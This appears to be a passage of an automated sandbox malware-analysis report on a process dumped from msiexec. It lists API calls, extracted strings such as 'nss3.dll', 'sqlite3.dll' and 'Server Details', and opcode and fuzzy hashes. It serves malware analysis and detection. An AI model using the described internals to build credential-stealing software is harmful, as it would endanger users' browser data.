                                                                                                          • API String ID: 1129539653-2417748251
                                                                                                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _msizerealloc
                                                                                                          • String ID: failed memory resize %u to %u bytes
                                                                                                          • API String ID: 2713192863-2134078882
                                                                                                          • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                          • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                          • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                          • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                          • strrchr.MSVCRT ref: 00409808
                                                                                                          • _mbscat.MSVCRT ref: 0040981D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileModuleName_mbscatstrrchr
                                                                                                          • String ID: _lng.ini
                                                                                                          • API String ID: 3334749609-1948609170
                                                                                                          • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                          • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                          • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                          • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                          APIs
                                                                                                          • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                          • _mbscat.MSVCRT ref: 004070FA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                                          • String ID: sqlite3.dll
                                                                                                          • API String ID: 1983510840-1155512374
                                                                                                          • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                          • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                          APIs
                                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileString
                                                                                                          • String ID: A4@$Server Details
                                                                                                          • API String ID: 1096422788-4071850762
                                                                                                          • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                          • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                          • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                          • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                          APIs
                                                                                                          • strlen.MSVCRT ref: 0040849A
                                                                                                          • memset.MSVCRT ref: 004084D2
                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,67CE7B60,?,00000000), ref: 0040858F
                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,67CE7B60,?,00000000), ref: 004085BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3110682361-0
                                                                                                          • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                          • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                          • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                          • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3510742995-0
                                                                                                          • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                          • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                          • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                          • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8